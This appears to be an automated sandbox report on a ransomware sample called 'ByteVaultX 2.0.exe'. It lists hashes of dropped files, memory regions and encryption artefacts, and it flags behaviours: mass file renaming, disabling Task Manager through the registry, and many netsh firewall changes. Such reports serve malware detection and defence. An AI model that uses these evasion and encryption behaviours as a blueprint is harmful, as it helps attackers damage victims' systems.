SHA256 d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7
SHA512 67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

C:\Users\Admin\AppData\Local\Temp\_MEI21962\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI21962\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI21962\cryptography\hazmat\bindings\_rust.pyd

MD5 61d63fbd7dd1871392997dd3cef6cc8e
SHA1 45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9
SHA256 ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5
SHA512 c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f

C:\Users\Admin\AppData\Local\Temp\_MEI21962\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

C:\Users\Admin\AppData\Local\Temp\_MEI21962\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

memory/4132-218-0x00007FFB65003000-0x00007FFB65004000-memory.dmp

memory/4132-220-0x0000019261520000-0x0000019261542000-memory.dmp

memory/4132-222-0x00007FFB65000000-0x00007FFB659EC000-memory.dmp

memory/4132-225-0x00007FFB65000000-0x00007FFB659EC000-memory.dmp

memory/4132-224-0x00000192615D0000-0x0000019261646000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xvz00z3d.lyu.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4132-255-0x00007FFB65000000-0x00007FFB659EC000-memory.dmp

memory/4132-260-0x00007FFB65000000-0x00007FFB659EC000-memory.dmp

memory/4132-264-0x00007FFB65000000-0x00007FFB659EC000-memory.dmp

memory/4676-284-0x000002AB69030000-0x000002AB69040000-memory.dmp

memory/4676-267-0x000002AB68F20000-0x000002AB68F30000-memory.dmp

memory/4676-302-0x000002AB68030000-0x000002AB68032000-memory.dmp

C:\Encrypt\encrypt.html

MD5 60722a327960e4b4f5d967101a72ed06
SHA1 04109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e
SHA256 3441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd
SHA512 98812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896

C:\Encrypt\encrypt.bat

MD5 59094544993f4727a85d62f55ea66f17
SHA1 39a125f1d71b596e57d14c2865626b95825f1053
SHA256 9b70930727653b6b647554cf3bd508fe9ba4981aaebcbeed91f7270653d679ca
SHA512 48f15e70f9e800533e3869b527d4cae504ef04a2fea38c9aa1f2bb541fd1fa559979a6b7e802da067b52a98202387fd5b9023dfa09f85d67c8c7b759f73a4774

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8f3969bac5758b14870d15f5352b09f0
SHA1 0154780441819ddbf1b8f807978ad404ea962c38
SHA256 2750aec9bd5451f0c09c4b97506336e7c17b50b72ffbc93b5942a0a4351bd3d9
SHA512 6945d933bebc0516220431312ade658a2f9e492aa5e1574f763c0022ebe0e9c1948c9fc12943ca98b978bd95944f598074de64068de77693cf416eb313284c54

memory/2332-360-0x00000163351C0000-0x00000163352C0000-memory.dmp

memory/2968-370-0x000002BD32A40000-0x000002BD32B40000-memory.dmp

memory/2968-369-0x000002BD32A40000-0x000002BD32B40000-memory.dmp

memory/2968-379-0x000002BD432C0000-0x000002BD432C2000-memory.dmp

memory/2968-377-0x000002BD432A0000-0x000002BD432A2000-memory.dmp

memory/2968-375-0x000002BD431E0000-0x000002BD431E2000-memory.dmp

memory/2968-372-0x000002BD431B0000-0x000002BD431B2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3f9cee8d910d3877eaa54a1ae95b9e53
SHA1 5721a8045cb79180c9c4557f8d9cceb8cbf14366
SHA256 69251bf1dfdb67c685ab238c10e28849b6dc593cdd416f3234ebd1019a802648
SHA512 1f176958e412518e51253fce62547b57483964f14ebe1ca176be859c86b3c28d990a396ebd52f7bf7899adf8d627749439f989d8fb524d7f4d7b517d0536497a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f39b2b014c8b09f215f5a94f9bf09c1c
SHA1 5e06b5bcec65e6d3a81b8df54b5962b2285bf8b3
SHA256 d3cad4fee75455adac41486a0778c57b3233e3d820f1f06f94a6f3f955be4ef6
SHA512 d848dc7a0ae64340e4361d8cadfae8ce18984ac08cc0b3ee160200ca71911307f8b88f45747836ccc4343f54189f58e2b2e0893780e53283e77a7bde6cc7b2f2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0b43cede31d2788f502952e03b9bbec4
SHA1 701462f704227bba4d8b4b3fdde68269039a58a6
SHA256 b6a12e01cd99f17bc7c416a6674882a18fb2a74f40d84dd0ef0b658899fa2ec6
SHA512 84902895c1a0a8c3ad22707946247774425434786c20eaaa5cb317201d7468ef0d15883b9c918407545b9811481a89ed569c3ec61c18315f238a76ec9509fd5f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 127eb9704d5bdbd18754b70710aa4650
SHA1 3b31e409162295a0aaf3324d8ffb3108f017395d
SHA256 1de19936e3737efc4c1bb2f66d36a65c3b867baa12e9b9791e1ad11d5a7ca70c
SHA512 2472dbaef4a2a76d9975d7ba06b3d91140779645c1c3b2b206e6ebe993a90aff7e8ddaf3ab8dddce3b83f6e2aa97f269940a1e9a5175cc8d5649a3f49f0041e6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 125829eaa666521a37aa39772b67b911
SHA1 526c49e6495aeb50179215e237e2e6d98b330603
SHA256 eaabd29cee06a82c66212396b9e4a941ecf6d989d8ea6b6deec72a8d796842ab
SHA512 924dced6381cc4629feb75562f4163db8fe405e5fea166e5e781ba78a0d57153459b67a57feed2ad847b2dbdc6f36874ff21d5801d3e3b2c2a32983e8490b536

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 07dbe11d0f127083f681a2d853118fd8
SHA1 be96eab765c07ba7f53e5c8a617684a912eb638a
SHA256 385e96b81c21ac38d7edf6ef32ca7ac6d2db9983d3cdaa1580204939ea076087
SHA512 efd5ce4c7728941134e5c410ac58d49e478b0eec5c465fdfc728faee5d45e92ccb56de121f5f07a5a59d14b1b6e8beb91c30bcb058f61072594e59d51d010e18

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4b21a350bf058cc00be3d3c4660aa433
SHA1 cbddb3bca38c97a4ea8cdceafe1d7e5b12b78790
SHA256 6ddc1fc80f331ecefe48003cb4e5c2a73420d05615301752c23973bf054bf4d4
SHA512 63f4ad4050fe5d0a7be8d492e3a7a7afceea3b2a8018e6d307f86072e7de83385e93f626c47afadecd26822bf0fa43afe417e5e2b2768b8b7bccba2adc0c2ab0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9e18e2d11fb5bcbcdf8d86afca9ce54b
SHA1 c4df76c890a9abafa6b37be19f3ce8bb42b0f5cb
SHA256 086e7f25649ebd642c819beaf46ac5089ab92b89aacc4278971b064af28fd78e
SHA512 2c19622877a34e9ef871abc7420a41fad2b36f5360c602423846684774aed4c52cea47a52bd665aec2363fc3d869258333cca36036367df7d35ad0aee6f17f39

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5eacaaab13956b3ec9da9055c63716bf
SHA1 7aa4b52423a2662ed1389fa38cc422f54ff6220a
SHA256 b2bf3dc261aa6481ab044c614bdebfeb64b5935de55e93ee5fd2cca85c62f66c
SHA512 b3426c27fce93b6708bf00549a9b8c3c66d72b810b24dc0556cf2b9261894de7b3e310c6b7c4e6b410039d8a3fe71540032eb428745f34b4ec9507ffed36a2bb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5a16ac060578caf4fa72ccc86bfb4b81
SHA1 2ad171a008b29d7f1bc9ddd681b66967ba44f41d
SHA256 3fa9e2bc33e505d197f798acd8f62cf0aad54c066d22c951173bf5cb27a9c6f3
SHA512 e5134031ff34426c6f555408a1a161f8bf19cbdfc5884559582eed68780440e6fdb213a126f56e07941352f283cabf51c6b8da44008a2ca9d60a6db7444bddce

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fecf49c91f79af8317f5ac7de88a3d64
SHA1 48fad0606d0c1ea8e093abe5ed394aa588e9909a
SHA256 c2e15b0d220493e9ac5561e63770d9c61192f252b5d3d2f6a96af3aa52ba3dbf
SHA512 a6c8d7ec0224d28f31685f281992f6abfb4afdb8c2a2589924f55605d9427b4c22ee6147f8aab42a34b9ea71f20b1a0d1336a9455e55243e7dd8d55efb0836f3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bcb5b8033445498254ccc0fdf86ff324
SHA1 0d7918526954cc26695281389990d0d3e4bff935
SHA256 eedc6723238e2250c7a3605e65423c862f4734c932a61695d30729bf867022ae
SHA512 ed5ec19ac4d10c3ff213bfb0a99e2b70815e838d176ceab0e14e1c4780800e079627bf7c8109f329dd1b4ab62752d1c505707b091d71a5be0101e2eccdbbd5f8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8aea995fd130cb14dc6def490b6af972
SHA1 d4686005d48cad3f479d3becf58239c2a9fcfc5a
SHA256 f93f53dccf40c21966f7720adb2235f391a443232eb54e3eee7db1c6f6d4ec85
SHA512 1a69def047bc6b479121e0629aa13ff930d1a23bb280f542cff58896b4cfd4dc13da8a9770937b7199022b28585665954223c882908700f4e5f4a26244e7ab18

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6a93b5450928d527520403dbcaa831ae
SHA1 bccbfa08c8b97bbc4ecfb198b94a985e1f854927
SHA256 46164f505b2d4bc020a876174d25b3147bfbe8056cddbc3bce1aa37273550108
SHA512 b5f29399ee2ee5bafbd6731a04212495b9475f8bbf5d8a86eb5f66725a9170cd931853335d34a59d15c7a2cb42e68b2e040941fa5f62b5d0b387bc0b51f0aa52

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 02f435b06d6f68930b9271108a2ac3a9
SHA1 2e609d7933342d5c94094cd5bd8a3c71f252150f
SHA256 cc9c8f83f6b95d1e2c4362219bd759a4b78c311574109688e1ea97a4829265ac
SHA512 ac7f932b23b7dce30f628fd43b7de5aa295d453571f380c81b3b2ff7a73d2ffd6510c53d5c672740e0def71eecb39c50555a9a51e3a3b702cb68d0386643914e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 70684e7eab5dac8c9e5f3dca5a7e2bbb
SHA1 3c5f35a7379c0f6c5372c2aa08f17baaae6e8afb
SHA256 e074164e1fad648dba038b26db9b7fb39d0ef8a6d573006becc0054d7c5c8cf5
SHA512 756b1c5cfe23aad69b706e8e9859e885840e54e9a0edfc2c5506c4f755dc9e7f631a5cfd3c76aeda5d978c692fa14f99c0c3868cc4c1a35368f371badb0c92a2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6435bc60821b951154f9a145ec43c127
SHA1 8d22626e7631a1a109d997f9a254320a193d2154
SHA256 c008ed82416cefd9eceaa30fd87d6c52fb9cd87a9e3642e7e125b43dc7343907
SHA512 d3d06252eb54d85cdee12a82f6ab93666c03ba57a6c0c56ab78130efd103a6c2fa53f950df7b9a7736c2fbd01a722287cf1d088c5bb196d1b4818320fda737ae

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d2b71f47151696c71f8ba7a0e04c9d35
SHA1 2330e0b2cef20d848ad3eb907c3879e08aa11cd1
SHA256 7070df91b97b0cf9c9120689ea6b564212d6982b4f2d7c51cf1b2f69724bd6f7
SHA512 01ff97ded497f96aa70ce6edb269e707c49d1bff01502301f10af1eb7477ec0ac1fb59fec7dd52c45eeea563c41f323c666695c790f22855be8fd20853ee3d32

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 82564ae0024514f6cb5f4aa7dcf9a61a
SHA1 6f7cd76bbe095ec0f912713415c866f62158e503
SHA256 47d533a6d2c407f1aa44f365044558aedaa90cd6aea52a34b7ae93c6edc82ba3
SHA512 574fdcc0b66f3bd8f2373ed47c23921e51b2160177ae0b4539749046c5b77f0e93a5e3f9b51848455cc04446848d688b4b2e104bc2ca902f211c6847168bfa0c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 41f60bf3f23efdae880fa7f431c6757e
SHA1 fb1b231d5fa4e4ddd6e2bc5615f6d2d9375db280
SHA256 5e1b8958cb664231c74da06acc7202c78aa2d617e9de14cce6a7d7a7b736402b
SHA512 8caa90ac514e9326bc28cc50f9b7b7e4dbd6760d5d2850929eecaf6b95c43433d7e4d24fb394dcd57a79541c5d495b09167d415c675ae181ee14d0e8ffbea514

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4d6b6a66cf7696e3e1ff4a9542c8ce95
SHA1 648af552b13f79eb6dca773f99c74cc842766693
SHA256 6b1b5d528a7496c7d0ea5987f5ff09d85a45549dcb0f6ddff6709c803d55d978
SHA512 996b7caf7867fb92450b452de917e39882afc6d2ad9eaf1e4d73898866bb79dcac688717d12a8f67cde6557d39c8cd96824cc393b95be0f879c8d24ecaaa49b4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5eaff73aa42a3b443c5327114ae6328f
SHA1 7ca8bcbf27676ec604e19aaecb237967060dd793
SHA256 6e43d778b27c2e66941dfa8664f57aee0cc043eb98fc410195cdbb63a4a85844
SHA512 22b9351b9a8c06722a7624914becb933a570492a441ab32e5656dc1a8d4eb021e87055936fc61acb040ab487262ce4ad7fb24f7a98fe1720fd12533f460eeeae

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0e252ef8654c077ae95c3b29cfa91ad8
SHA1 629d499fc67e1b0f7deff6509923624e472a4891
SHA256 7b5995e1c2d5a266d38d1d1b2d5f85818db60f2961a893f09512dd2931357981
SHA512 d2c38f14db7b6a162cf1c907ea56c262030528230c51a4474f76fc48d844a21768af554144943f19cfc338dd91cfd0022eb56a4c7fb626f6bc18820547ba3bf2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4bc43c64498ec6deb14ee893123fec1c
SHA1 48bc4f409689d5f01c094f300b10bb559a3140ac
SHA256 d3dc8b4a4c0f1e539d597fa53e1c0cc9c09f85433b0cf28282a254946e45124e
SHA512 27dcab11a05f8a1d7b45b1e641fa958f70d2017ed5db3190bffad5c227ecc2388ab2005eedae45cd39ec189a33a1a61f30c37ecc21dc1701dd93590ccc1d3455

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb74a117bd937770897e0f0d5ebf86e6
SHA1 fa8a672129246fd99da8fcc30fd6ab0a4f5af5be
SHA256 1a38a786ea073f83b07e886743a74d526c3585986607531cf5bec2b7522a465e
SHA512 95f640c2c91e62b574257618338a8d35c10109d4a3f9ae27cbca68d7ce44ace37481d87f17fb8bc84dab8083c2ac6e9fa4972c5988d78b2f73c0f217c6444436

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0cfd021e0b919e5f81eb1a31f58ea3f4
SHA1 849ba8825e1698f7221a8e67152d743e6efec49b
SHA256 301fae8d1dd7d8e00096622a322ef476a9a97ff5cf5fd1c0bc631707edec7d89
SHA512 37c90e1e2c5c15004436660c331a209ef395ccb9437727aa7b4ff51565722317dd368f11b5a6eb43c01c3e64b4041c47745f6785d35fdd72903aa6d8d0422bbf

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3b04aec6497684b6952474b9a5bb3943
SHA1 783634978a928ab8cccb4b948d153ae1fde9527d
SHA256 0a599a87ea9d49734a19814cf1734816fec80ac1751c9fa0ee1d3b1cba2d40b3
SHA512 cd12320e9172a5e61187757fc262f8f8466f864077aff456a673218d14a3144c3fd5b7bafe2046b2f4191ae79afe012e454072bab3f4b74e7376bde13148eca0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e391058a2fe630efa04f7f8e1c66d88f
SHA1 236f057a4c2bd8f517b0919bd5b62d1c74088753
SHA256 b46be770185579bd673cb89ff1393117535265b248556ce03857ddc00b2442df
SHA512 c9dca728fb922829ba1204a9a7dce01bfdf6c828842e3efcb8025185a312b523245ffbf7339c118a8ae961039b1d7feed34af491cbdbd9222ca4eff84b2380c9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6a81579ed49f6b6c777a9a7400e5a51d
SHA1 2de5692a3f692838d4178548c30211c0233946bf
SHA256 194028a8cbc5e84cdf5851b7b758802642372f0dd94df777ea0773c86176ca37
SHA512 0443d89869f3aa88c80917ddc3267f689f5a6e573347848d541ad48786b6d6d05a951bb749a0a9a6b18533d773ac5e7eefbc5e0367aec21bf3227858050d5a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b6b9daa065e25a5b7e1563d9c18d2db6
SHA1 ea2e6d9fbd781136e6036c53d31dc19d63f08b3f
SHA256 3d722401203f90dec194c89b29de7cd9c0ac88fa37af69cab662526bbf6a5beb
SHA512 7560695d44d2708326a459576b6bc003f19479022efe84a4f7fa826324e84a1413cbbe8906bedb55de4865a919fb597a73b98fdd8a01eb515417e9e965f73434

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2fb9c5fb6a700953a1cbfd43c50bec1b
SHA1 89e51bb63df9107da77488c56865f528cd9fe7b8
SHA256 1c95f1df119e262c8d4bfeeb488db1bcd58dd3b1a194f58f660cc2ab9ed540fb
SHA512 de42e587dcc788cb21162a917cf4abf34721ae9824e7b1120fef95229bf082d2b8d36a531a6886a42a6fd3b11d6820358b483bd5e4ca2f58a314ccdc831983f2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 be1d57ab433e2939bebb4e1966e97c17
SHA1 6ff4038171601ed15fac55415f3d2c5ecd27d482
SHA256 544930e8aba3766735f2bb98cc89e952930d7cb64a82742347cd232016627401
SHA512 efc5b4795fe08e0273091fd0ed5776a3fc70d60008c8b98d5a80b174504c3f08f66ac4796f02994b03afc091c5e8d3c079d0de2b5ff68b8fa119ed1c8a28eec1

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\V28C7N3J\edgecompatviewlist[1].xml

MD5 d4fc49dc14f63895d997fa4940f24378
SHA1 3efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512 cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

memory/4676-3550-0x000002AB6F8A0000-0x000002AB6F8A1000-memory.dmp

memory/4676-3551-0x000002AB6F8B0000-0x000002AB6F8B1000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\6APURFWU\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d45d0c7993e94f8f455725fca1b8ba3c
SHA1 96b7e9b2074f9133c3c6e54aa242857c8d59f295
SHA256 fd78dbe0e971dd6c3a9312cfb3228425302ccd0dfb9efd6fd93d1c0719a98e5a
SHA512 7905c97d2a59732534b68a09c67cf692447bb591b8c051fa89f1baffa0146a6c1094142414972a42be405d1b013fe0adeb5242d7b6c77119e1194c6366f6ca16

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 26bf909eddce8debd719d3dec23aa27f
SHA1 d2dd60a225253f206f1b3806a87ac806627dd6ab
SHA256 1b1a71482283f6a7b9de67787f272c43207fd734becb9f7d0d929042b9e67e94
SHA512 8d53f9399aade084f386ef3a405178bf3bc274072f4b22168ee0ed1dc85ef4a443418eb943e48e432301fba4329e61577800118ea55fff23b4e9d08b87a7d4bd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e1ead4954d52474bf1a19606fad503df
SHA1 3bdd4710ab00f0b54143206a74930ef04eb1e37d
SHA256 0923aeb048e14ca3de1e50b43c30650653555998485b5c2ea6c38f4fa0d0ffa5
SHA512 170f40bdccfee3beba9e36224789f7128a3550c031cb2345ad197703e431695e58d2df5e3892ed0a671049d9b94097f54de5cc4ec115f19fca550a78139a5945

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d3028e10f80c101c17bd901389b79d14
SHA1 807e5374a748c291086959c8b4248747a1729765
SHA256 b335cede08c250f83768fa1abd3ac3657dbfe45ca4d24e0951dbb4907263f2b9
SHA512 a5534a178faa659f0224734f40b72c9a61902b0e86defe01fe66b778411b1679ac5049ad19ab2fdd38620bd4d5d2ad4327293e8bab98cbe81d1be13e2ac4a3a7

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-25 23:21

Reported

2024-05-25 23:24

Platform

win7-20240419-en

Max time kernel

120s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI9922\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-25 23:21

Reported

2024-05-25 23:24

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

Signatures

Renames multiple (143) files with added filename extension

ransomware

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
